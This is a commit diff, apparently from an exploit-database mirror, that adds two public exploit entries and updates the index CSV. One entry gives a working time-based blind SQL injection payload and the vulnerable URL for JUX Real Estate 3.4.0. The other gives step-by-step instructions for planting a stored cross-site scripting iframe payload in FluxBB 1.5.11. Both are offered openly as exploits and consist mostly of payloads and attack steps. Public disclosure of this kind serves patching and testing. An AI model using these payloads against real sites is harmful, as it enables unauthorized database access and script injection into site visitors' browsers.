DB: 2025-03-21

3 changes to exploits/shellcodes/ghdb FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS) JUX Real Estate 3.4.0 - SQL Injection
2025-03-21 00:16:35 +00:00 · 2025-03-21 00:16:35 +00:00 · 40ceb13974
commit 40ceb13974
parent 04fa5ba95d
3 changed files with 64 additions and 0 deletions
--- a/exploits/php/webapps/52089.txt
+++ b/exploits/php/webapps/52089.txt
@ -0,0 +1,44 @@
+# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 26/02/2025
+# Vendor: JoomlaUX
+# Vendor Homepage: https://joomlaux.com/
+# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
+# Demo Link: http://demo.joomlaux.com/#jux-real-estate
+# Tested on: Windows 11 Pro
+# Impact: Database Access
+# CWE: CWE-89 - CWE-74 - CWE-707
+# CVE: CVE-2025-2126
+# VDB: VDB-299039
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
+
+GET Parameter 'title' is vulnerable to SQLi
+
+
+---
+Parameter: title (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
+
+
+## POC:
+
+https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]
+
+## Payload:
+
+1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
+
+
+
+[-] Done
--- a/exploits/php/webapps/52090.txt
+++ b/exploits/php/webapps/52090.txt
@ -0,0 +1,18 @@
+# Exploit Title: FluxBB 1.5.11 Stored xss
+# Date: 3/8/2025
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: www.fluxbb.org
+# Software Link: https://www.softaculous.com/apps/forums/FluxBB
+# Version: FluxBB 1.5.11
+# Tested on: Windows XP
+
+
+1. login to admin panel
+2. go to /admin_forums.php
+3. click on "add forum"
+4. in description text area put this payload:
+
+<iframe src=javascript:alert(1)>
+
+5. save changes
+now everytime users enter the home page will see the alert.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18728,6 +18728,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8036,exploits/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,webapps,php,,2009-02-09,,1,,,,,,
 2018,exploits/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,webapps,php,,2006-07-15,,1,OSVDB-27331;CVE-2006-3755;CVE-2006-3754,,,,http://www.exploit-db.comflushcms.1.0.0.pre2.tar.gz,
 5767,exploits/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,webapps,php,,2008-06-08,2016-12-05,1,OSVDB-46644;CVE-2008-2686,,,,,
+52090,exploits/php/webapps/52090.txt,"FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS)",2025-03-20,"Chokri Hammedi",webapps,php,,2025-03-20,2025-03-20,0,,,,,,
 27190,exploits/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,webapps,php,,2013-07-29,2013-07-29,0,OSVDB-95807;OSVDB-95806;OSVDB-95805,,,,http://www.exploit-db.comfluxbb-1.5.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5150.php
 26241,exploits/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",webapps,php,,2013-06-17,2013-06-18,1,OSVDB-94406,,,http://www.exploit-db.com/screenshots/idlt26500/screen-shot-2013-06-18-at-30454-pm.png,http://www.exploit-db.com2012-07-08_unstable.zip,
 23163,exploits/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",webapps,php,,2003-09-19,2012-12-05,1,,,,,,https://www.securityfocus.com/bid/8659/info
@ -22243,6 +22244,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23386,exploits/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",webapps,php,,2003-11-17,2012-12-14,1,OSVDB-2820,,,,,https://www.securityfocus.com/bid/9056/info
 9308,exploits/php/webapps/9308.txt,"justVisual 1.2 - 'fs_jVroot' Remote File Inclusion",2009-07-30,SirGod,webapps,php,,2009-07-29,,1,OSVDB-56679;CVE-2009-3511;OSVDB-56678;OSVDB-56677;OSVDB-56676,,,,,
 11876,exploits/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,webapps,php,,2010-03-24,,1,OSVDB-63156;CVE-2010-1268,,,,,
+52089,exploits/php/webapps/52089.txt,"JUX Real Estate 3.4.0 - SQL Injection",2025-03-20,CraCkEr,webapps,php,,2025-03-20,2025-03-20,0,CVE-2025-2126,,,,,
 3125,exploits/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,webapps,php,,2007-01-13,,1,OSVDB-32811;CVE-2007-0329,,,,,
 3240,exploits/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",webapps,php,,2007-01-30,,1,OSVDB-33077;CVE-2007-0682,,,,,
 12688,exploits/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",webapps,php,,2010-05-20,,0,OSVDB-65059;CVE-2010-2127,,,,,